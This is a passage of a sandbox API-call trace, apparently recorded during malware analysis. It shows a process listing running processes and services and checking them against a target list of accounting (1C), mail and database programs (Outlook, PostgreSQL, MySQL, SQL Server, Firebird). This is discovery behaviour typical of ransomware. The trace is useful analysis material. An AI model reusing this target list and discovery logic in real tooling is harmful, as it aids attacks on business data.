	[0149.343] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0149.343] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0149.343] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0149.344] lstrlenW (lpString="lsm.exe") returned 7
	[0149.344] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0149.344] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0149.344] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0149.344] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0149.344] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0149.344] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.344] lstrlenW (lpString="svchost.exe") returned 11
	[0149.344] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.344] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.345] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.345] lstrlenW (lpString="svchost.exe") returned 11
	[0149.345] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.345] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.345] lstrlenW (lpString="svchost.exe") returned 11
	[0149.345] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.345] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.346] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.346] lstrlenW (lpString="svchost.exe") returned 11
	[0149.346] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0149.346] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0149.346] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.347] lstrlenW (lpString="svchost.exe") returned 11
	[0149.347] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0149.347] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0149.347] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0149.347] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0149.347] lstrlenW (lpString="audiodg.exe") returned 11
	[0149.347] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.347] lstrlenW (lpString="svchost.exe") returned 11
	[0149.347] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.348] lstrlenW (lpString="svchost.exe") returned 11
	[0149.348] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0149.348] lstrlenW (lpString="spoolsv.exe") returned 11
	[0149.348] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0149.348] lstrlenW (lpString="svchost.exe") returned 11
	[0149.348] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0149.349] lstrlenW (lpString="taskhost.exe") returned 12
	[0149.349] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0149.349] lstrlenW (lpString="userinit.exe") returned 12
	[0149.349] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0149.349] lstrlenW (lpString="dwm.exe") returned 7
	[0149.349] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0149.350] lstrlenW (lpString="explorer.exe") returned 12
	[0149.350] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0149.350] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0149.350] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0149.350] lstrlenW (lpString="reader_sl.exe") returned 13
	[0149.350] Process32NextW (in: hSnapshot=0x3ac, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0149.351] CloseHandle (hObject=0x3ac) returned 1
	[0149.351] Sleep (dwMilliseconds=0x1f4) 
	[0149.940] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb6172f0
	[0149.951] EnumServicesStatusExW (in: hSCManager=0xb6172f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0149.951] GetLastError () returned 0xea
	[0149.952] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0149.952] EnumServicesStatusExW (in: hSCManager=0xb6172f0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0149.952] CloseServiceHandle (hSCObject=0xb6172f0) returned 1
	[0149.952] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0149.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0149.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0149.952] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0149.952] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0149.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0149.952] lstrlenW (lpString="AudioSrv") returned 8
	[0149.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0149.952] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0149.952] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0149.952] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0149.952] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0149.952] lstrlenW (lpString="BFE") returned 3
	[0149.952] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0149.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0149.953] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0149.953] lstrlenW (lpString="CryptSvc") returned 8
	[0149.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0149.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0149.953] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0149.953] lstrlenW (lpString="CscService") returned 10
	[0149.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0149.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0149.953] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0149.953] lstrlenW (lpString="DcomLaunch") returned 10
	[0149.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0149.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0149.953] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0149.953] lstrlenW (lpString="Dhcp") returned 4
	[0149.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0149.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0149.953] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0149.953] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0149.953] lstrlenW (lpString="Dnscache") returned 8
	[0149.953] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0149.953] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0149.954] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0149.954] lstrlenW (lpString="DPS") returned 3
	[0149.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0149.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0149.954] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0149.954] lstrlenW (lpString="eventlog") returned 8
	[0149.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0149.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0149.954] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0149.954] lstrlenW (lpString="EventSystem") returned 11
	[0149.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0149.954] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0149.954] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0149.954] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0149.954] lstrlenW (lpString="gpsvc") returned 5
	[0149.954] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0149.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0149.955] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0149.955] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0149.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0149.955] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0149.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0149.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0149.955] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0149.955] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0149.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0149.955] lstrlenW (lpString="lmhosts") returned 7
	[0149.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0149.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0149.955] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0149.955] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0149.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0149.955] lstrlenW (lpString="MMCSS") returned 5
	[0149.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0149.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0149.955] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0149.955] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0149.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0149.955] lstrlenW (lpString="MpsSvc") returned 6
	[0149.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0149.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0149.955] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0149.955] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0149.955] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0149.955] lstrlenW (lpString="NlaSvc") returned 6
	[0149.955] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0149.955] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0149.956] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0149.956] lstrlenW (lpString="nsi") returned 3
	[0149.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0149.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0149.956] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0149.956] lstrlenW (lpString="PcaSvc") returned 6
	[0149.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0149.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0149.956] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0149.956] lstrlenW (lpString="PlugPlay") returned 8
	[0149.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0149.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0149.956] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0149.956] lstrlenW (lpString="Power") returned 5
	[0149.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0149.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0149.956] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0149.956] lstrlenW (lpString="ProfSvc") returned 7
	[0149.956] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0149.956] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0149.956] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0149.956] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0149.957] lstrlenW (lpString="RpcEptMapper") returned 12
	[0149.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0149.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0149.957] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0149.957] lstrlenW (lpString="RpcSs") returned 5
	[0149.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0149.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0149.957] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0149.957] lstrlenW (lpString="SamSs") returned 5
	[0149.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0149.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0149.957] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0149.957] lstrlenW (lpString="Schedule") returned 8
	[0149.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0149.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0149.957] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0149.957] lstrlenW (lpString="SENS") returned 4
	[0149.957] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0149.957] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0149.957] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0149.957] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0149.958] lstrlenW (lpString="ShellHWDetection") returned 16
	[0149.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0149.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0149.958] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0149.958] lstrlenW (lpString="Spooler") returned 7
	[0149.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0149.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0149.958] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0149.958] lstrlenW (lpString="Themes") returned 6
	[0149.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0149.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0149.958] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0149.958] lstrlenW (lpString="UxSms") returned 5
	[0149.958] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0149.958] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0149.958] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0149.958] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0149.958] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0149.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3b4
